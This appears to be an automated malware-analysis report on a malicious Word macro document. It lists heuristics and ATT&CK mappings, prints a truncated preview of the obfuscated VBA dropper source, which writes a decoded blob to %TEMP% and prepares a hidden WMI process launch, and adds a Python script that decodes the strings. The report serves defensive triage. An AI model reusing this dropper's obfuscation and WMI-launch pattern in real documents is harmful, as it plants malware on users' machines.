Verdict: MALICIOUS
Risk Score: 230

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1203 Exploitation for Client Execution
The sample is a malicious Word (OLE) document containing VBA macros. The recovered source is string-obfuscated: literals are stored as hex (decoded by ftyftpxlnnbi), most are then wrapped in two layers of base64 (decoded by the custom decoder wazwyomiuchznhnwqk, applied twice), and some carry junk tokens such as "fzkJ" that are stripped with Replace at runtime. Decoding the literals visible in the preview gives a clear picture of the dropper logic in Sub yfdovpkppbkx: GetObject("winmgmts:\\.\root\cimv2") binds to WMI; CreateObject("Scripting.FileSystemObject") is used to write a base64-decoded blob (built from the caption of the Nbszek Label control and two variables not present in the preview) to Environ("temp") & "\errors.bQt"; a Win32_ProcessStartup instance is spawned with ShowWindow = 0 (SW_HIDE); and a second GetObject resolves winmgmts:\\.\root\cimv2:Win32_Process, the WMI class used to create a process without a direct Shell call. The preview is cut off before the process is created, so the exact command line, and whether anything is downloaded rather than dropped from the document itself, are not shown.

Two points for triage. First, the visible trigger is not a classic AutoOpen procedure but the InkEdit1_GotFocus event handler of an embedded InkEdit ActiveX control, which fires when the control receives focus after the document opens; the WordBasic AutoOpen marker flagged below is separate evidence of an auto-exec surface. Second, nothing in the extracted code points to exploitation of a parsing vulnerability: execution depends on macros being enabled, so T1059.005 is well supported by the evidence on this page, while T1203 is not, and T1204.002 (User Execution: Malicious File) describes the delivery more accurately. Taken together with the ClamAV detection Doc.Dropper.Agent-6842387-0, the evidence is consistent with a dropper that writes an embedded payload to %TEMP% and executes it through WMI.
Heuristics (8)

- ClamAV: Doc.Dropper.Agent-6842387-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6842387-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code.
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call.
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access).
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note: the rule text is generic; in this report a VBA project was recovered (macros.bas below), so treat this marker as corroborating the macro findings rather than as stand-alone evidence.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace that appears in any document containing drawings or shapes; it is not a network indicator and should not be blocked or hunted for.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5196 bytes | e6ce7407a6ce9150d37d4d87b647afa2b3ae4ae6e0f34901432c7aa4d1a9dc91 |
Script preview (first 1,000 lines of the extracted script; the output below is truncated):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "InkEdit1, 1, 0, INKEDLib, InkEdit"
Attribute VB_Control = "Nbszek, 0, 1, MSForms, Label"
Const ycjthyqvtu = 2
Const trpyttcmtf = 1
Const dgovyatzbi = 0
Function wazwyomiuchznhnwqk(ByVal xksoz)
Const ksnzjuJ = "ABCDEFGHI" & "JKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
Dim flkeuaizpX8, sOut, groupBegin
xksoz = Replace(xksoz, vbCrLf, "")
xksoz = Replace(xksoz, vbTab, "")
xksoz = Replace(xksoz, " ", "")
flkeuaizpX8 = Len(xksoz)
For groupBegin = 1 To flkeuaizpX8 Step 4
Dim oieuslDm5, cdsnuzkqw, fleokquza24, thisData, nGroup, pOut
oieuslDm5 = 3
nGroup = 0
For cdsnuzkqw = 0 To 3
fleokquza24 = Mid(xksoz, groupBegin + cdsnuzkqw, trpyttcmtf)
If fleokquza24 = ftyftpxlnnbi("3d") Then
oieuslDm5 = oieuslDm5 - 1
thisData = 0
Else
thisData = InStr(trpyttcmtf, ksnzjuJ, fleokquza24, vbBinaryCompare) - 1
End If
nGroup = 64 * nGroup + thisData
Next
nGroup = Hex(nGroup)
nGroup = String(6 - Len(nGroup), ftyftpxlnnbi("30")) & nGroup
pOut = Chr(CByte(ftyftpxlnnbi("2648") & Mid(nGroup, trpyttcmtf, ycjthyqvtu))) + _
Chr(CByte(ftyftpxlnnbi("2648") & Mid(nGroup, 3, ycjthyqvtu))) + _
Chr(CByte(ftyftpxlnnbi("2648") & Mid(nGroup, 5, ycjthyqvtu)))
sOut = sOut & Left(pOut, oieuslDm5)
Next
wazwyomiuchznhnwqk = sOut
End Function
Sub InkEdit1_GotFocus()
aYceLzaRWBzdRqDWb = "aOGkwNbYBd"
YTKJWDTRZtkXa = Array(20, 15, 20, 35, 31, 58)
GAvuEHVfQysLEj = 21584788
Call yfdovpkppbkx
Call fzepfezpofekpoz
AeqRGHLlmVhwHBoKd = "fleOdkzISsjz"
ctXVLbUCmpVfT = "CauOMqWkqh"
OPPrxGHgqouNQe = 1914037291
VhdjxdXMbJYoLx = 2068248205
End Sub
Sub yfdovpkppbkx()
Const NOWi = 0
vqccswqowqabbuvq = ftyftpxlnnbi("2e")
Set biqbgkumtrrvn = GetObject(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5a44") & ftyftpxlnnbi("4a7364574a585a48526b5345303257455a3350513d3d"))) & vqccswqowqabbuvq & wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5745684b646d497a556d") & ftyftpxlnnbi("4e5a4d6d78305a47704a50513d3d"))))
apzosi4 = ftyftpxlnnbi("667a6b4a53667a6b4a6372667a6b4a69707469667a6b4a6e67667a6b4a4e786a736b497a46667a6b4a69667a6b4a6c655379667a6b") & ftyftpxlnnbi("4a7374667a6b4a656d667a6b4a4f62667a6b4a6a65667a6b4a63667a6b4a74667a6b4a")
apzosi4 = Replace(apzosi4, "fzkJ", "")
whQCjggoliwSV = "IabvKkbGjPicZMYr"
YGqLtrvPMriXTUsG = 815423797
apzosi4 = Replace(apzosi4, ftyftpxlnnbi("4e78") & ftyftpxlnnbi("6a736b497a"), ftyftpxlnnbi("2e"))
ILeQuXWajoJEzSyd = 1683081379
ahbsmrdxeqqezbwxlkug = Environ(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5a456457") & ftyftpxlnnbi("64474e425054303d")))) & wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5745645765574e744f586c6a6554") & ftyftpxlnnbi("56705756685250513d3d")))
lsokNuezi = apzosi4
geCrMKOADRPpQZ = "eZGrSeXDuHjVFvy"
kebxxrhrr = wazwyomiuchznhnwqk(dzksju & Nbszek & odkzadozj)
Set kbqehickihorkonwrx = CreateObject(lsokNuezi)
Dim uqmhjmqhiikshwdw As Object
Set uqmhjmqhiikshwdw = kbqehickihorkonwrx.CreateTextFile(ahbsmrdxeqqezbwxlkug)
OarmHjHpdHCvL = "sgmhzEeJkAZjWtG"
jqotZFrXtxieQimo = 1900470925
uqmhjmqhiikshwdw.WriteLine kebxxrhrr
uqmhjmqhiikshwdw.Close
Set ravtubttrfazxvdqv = biqbgkumtrrvn.Get(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("56") & ftyftpxlnnbi("6a4a7364553136536d5a565345703257544a57656d4d78546a425a57456f775a46684250513d3d"))))
Set xwpvqlgjnxtessvnnig = ravtubttrfazxvdqv.SpawnInstance_
xwpvqlgjnxtessvnnig.ShowWindow = NOWi
oiKVesAQrMBKVTi = "JXiQbVRsuPZLU"
Set ayqubuuwvnjkdwizi = GetObject(wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("5a444a7364") & ftyftpxlnnbi("574a585a48526b5345303257455a3350513d3d"))) & vqccswqowqabbuvq & wazwyomiuchznhnwqk(wazwyomiuchznhnwqk(ftyftpxlnnbi("574568") & ftyftpxlnnbi("4b646d497a556d4e5a4d6d78305a47704a4e6c59796248564e656b706d5655684b646c6b79566e706a647a3039"))))
dyknndtjyagyairypf = Environ(
... (truncated)
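The strings in the preview above can be recovered without running the macro. The following Python is an added example for this report; it is not code from the sample, from oletools or from the analyzer. It re-implements the two decoding primitives the macro uses (ftyftpxlnnbi is a hex decoder, as its use for "&H" and "=" shows; wazwyomiuchznhnwqk is a hand-rolled base64 decoder over the standard alphabet spelled out in ksnzjuJ) and applies them to the hex literals copied from Sub yfdovpkppbkx. The only assumption is that the custom decoder and the standard library agree on well-formed base64, which they do for the literals here.

```python
"""Recover the obfuscated strings from the macros.bas preview.

Added example for this report, not code from the sample or the analyzer.
Every hex literal below is copied verbatim from the preview.
"""
import base64
import binascii


def hex_decode(s: str) -> str:
    """Equivalent of the macro's ftyftpxlnnbi(): hex digits -> text.

    The macro also uses it for tiny constants: "3d" -> "=", "30" -> "0",
    "2648" -> "&H" (the CByte("&H..") trick), "2e" -> ".".
    """
    return binascii.unhexlify(s).decode("ascii")


def b64_decode(s: str) -> str:
    """Equivalent of wazwyomiuchznhnwqk(): custom base64 decoder.

    Like the macro, strip CRLF, tabs and spaces first; for well-formed
    input the standard library yields the same bytes.
    """
    cleaned = s.replace("\r\n", "").replace("\t", "").replace(" ", "")
    return base64.b64decode(cleaned).decode("latin-1")


def double_b64(s: str) -> str:
    """The macro always feeds the decoder its own output (two base64 layers)."""
    return b64_decode(b64_decode(s))


def decode_sample_literals() -> dict:
    """Rebuild the strings exactly as Sub yfdovpkppbkx() constructs them."""
    dot = hex_decode("2e")  # vqccswqowqabbuvq

    # First GetObject(): two double-base64 parts joined by "."
    wmi_namespace = (
        double_b64(hex_decode("5a44") + hex_decode("4a7364574a585a48526b5345303257455a3350513d3d"))
        + dot
        + double_b64(hex_decode("5745684b646d497a556d") + hex_decode("4e5a4d6d78305a47704a50513d3d"))
    )

    # CreateObject() ProgID: hex, then junk token "fzkJ" removed, then a
    # second junk token ("Nx" + "jskIz") replaced with "."
    progid = hex_decode(
        "667a6b4a53667a6b4a6372667a6b4a69707469667a6b4a6e67667a6b4a4e786a736b497a46667a6b4a69667a6b4a6c655379667a6b"
    ) + hex_decode("4a7374667a6b4a656d667a6b4a4f62667a6b4a6a65667a6b4a63667a6b4a74667a6b4a")
    progid = progid.replace("fzkJ", "")
    progid = progid.replace(hex_decode("4e78") + hex_decode("6a736b497a"), dot)

    # Environ() variable and the file name appended to it (drop location)
    env_var = double_b64(hex_decode("5a456457") + hex_decode("64474e425054303d"))
    drop_name = double_b64(hex_decode("5745645765574e744f586c6a6554") + hex_decode("56705656685250513d3d"))

    # .Get() class name whose SpawnInstance_ gets ShowWindow = 0
    startup_class = double_b64(
        hex_decode("56") + hex_decode("6a4a7364553136536d5a565345703257544a57656d4d78546a425a57456f775a46684250513d3d")
    )

    # Second GetObject(): WMI moniker for the class used to launch processes
    process_path = (
        double_b64(hex_decode("5a444a7364") + hex_decode("574a585a48526b5345303257455a3350513d3d"))
        + dot
        + double_b64(
            hex_decode("574568")
            + hex_decode("4b646d497a556d4e5a4d6d78305a47704a4e6c59796248564e656b706d5655684b646c6b79566e706a647a3039")
        )
    )

    return {
        "wmi_namespace": wmi_namespace,
        "progid": progid,
        "env_var": env_var,
        "drop_name": drop_name,
        "startup_class": startup_class,
        "process_path": process_path,
    }


if __name__ == "__main__":
    for name, value in decode_sample_literals().items():
        print(f"{name:14} {value}")
```

Running it prints the WMI moniker, the FileSystemObject ProgID, the temp variable and file name, Win32_ProcessStartup and the Win32_Process moniker. The blob written to the dropped file cannot be recovered this way because it is assembled from the Nbszek control caption and two variables that are not in the preview; for that, extract the form data streams from the OLE container as well.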